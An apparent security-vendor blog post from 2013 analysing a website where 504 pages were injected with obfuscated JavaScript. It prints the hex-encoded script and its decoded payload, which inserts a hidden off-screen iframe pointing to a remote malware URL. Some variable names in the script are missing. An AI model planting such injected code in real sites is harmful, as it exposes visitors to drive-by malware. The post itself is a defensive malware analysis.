Tuesday, August 6, 2013

504 webpages infected with malicious iframes

Massive JavaScript injection in website pages to serve malicious iframes

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

It this website 504 files were identified as Suspicious by malware scanner. Detected JavaScript code injects iframe pointing to .php file hosted on a remote Blacklisted domain. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date/ time: Mon Aug 5 07:59:26 2013
Infected website's files count: 504
Website malware scan report link: http://goo.gl/pUvzch


Quttera online Website Malware Scanner
Quttera online Website Malware Scanner

Threat dump:

Malicious JavaScript detected in 504 website pages
Malicious JavaScript detected in 504 website pages


Malware entry


Malware entry details.

Beautified script

  1. aq = "0x";
  2. bv = (5 - 3 - 1);
  3. sp = "s" + "p" + "li" + "t";
  4. = window;
  5. = "dy";
  6. = document;
  7. try {
  8.     ++(d.body)
  9. } catch (d21vd12v) {
  10.     vzs = false;
  11.     try {} catch (wb) {
  12.         vzs = 21;
  13.     }
  14.     if (1) {
  15.         f ="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60,65,25,5b,5c,26,67,5b,5d,26,6b,5c,6a,6b,25,67,5f,67,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,64,60,63,5c,65,58,24,6e,5c,60,65,25,5b,5c,26,67,5b,5d,26,6b,5c,6a,6b,25,67,5f,67,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"[sp](",");
  16.     }
  17.     w = f;
  18.     s = [];
  19.     for (= 20 - 20; - i + 590 != 0; i += 1) {
  20.         j = i;
  21.         if ((0x19 == 031)) s += String["fromCharCode"](eval(aq + w[j]) + 0xa - bv);
  22.     }
  23.     ht = eval;
  24.     alert(s);
  25. }


Malicious payload


Decoded payload injects hidden iframe to http://milena-wein.de/pdf/test.php

  1. if (document.getElementsByTagName('body')[0]) {
  2.     iframer();
  3. } else {
  4.     document.write("<iframe src='http://milena-wein.de/pdf/test.php' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
  5. }
  6.  
  7. function iframer() {
  8.     var f = document.createElement('iframe');
  9.     f.setAttribute('src', 'http://milena-wein.de/pdf/test.php');
  10.     f.style.left = '-10000px';
  11.     f.style.top = '0';
  12.     f.style.position = 'absolute';
  13.     f.style.top = '0';
  14.     f.setAttribute('width', '100');
  15.     f.setAttribute('height', '100');
  16.     document.getElementsByTagName('body')[0].appendChild(f);
  17. }


Blacklisting status

Redirect URL is detected by VirusTotal with ratio: 4/39

VirusTotal scan report overview

To view analysis by VirusTotal click here


The website is Suspicious on Google Safe Browsing.

Google Safe Browsing analysis


To view analysis - click here

Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.